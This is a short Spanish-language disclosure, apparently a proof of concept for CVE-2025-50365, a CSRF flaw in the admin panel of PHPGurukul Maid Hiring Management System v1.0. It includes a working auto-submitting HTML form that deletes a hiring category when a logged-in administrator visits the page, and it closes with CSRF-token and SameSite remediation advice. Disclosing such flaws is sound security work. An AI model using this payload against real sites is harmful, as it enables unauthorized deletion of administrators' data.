
PoC para CVE-2025-50365: una vulnerabilidad CSRF en PHPGurukul Maid Hiring Management System que permite la eliminación de categorías de contratación mediante una solicitud de administrador manipulada.
Nombre del proyecto y URL del repositorio: Maid Hiring Management System using PHP and MySQL
Tipo de vulnerabilidad: Falsificación de solicitudes del lado del cliente
Versión(es) afectada(s): v1.0
💣Descripción de la vulnerabilidad: Existe una vulnerabilidad de falsificación de solicitudes entre sitios (CSRF) en el panel de administración del Sistema de Gestión de Contratación de PHPGurukul, que permite a un atacante eliminar categorías de contratación arbitrarias engañando a un administrador autenticado para que visite un sitio malicioso. Esto puede provocar la eliminación de datos y cambios no autorizados a nivel de administrador.
👩💻Impacto: Eliminación no autorizada de categorías.
🛜Prueba de concepto (PoC):

/admin/manage-category.php
CSRF-POC<html>
<body>
<form action="http://127.0.0.1/mhms/admin/manage-category.php">
<input type="hidden" name="delid" value="13" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>


Recomendación: Implementar tokens CSRF en los formularios de administración, aplicar cookies SameSite y validar el origen de la solicitud para prevenir acciones no autorizadas.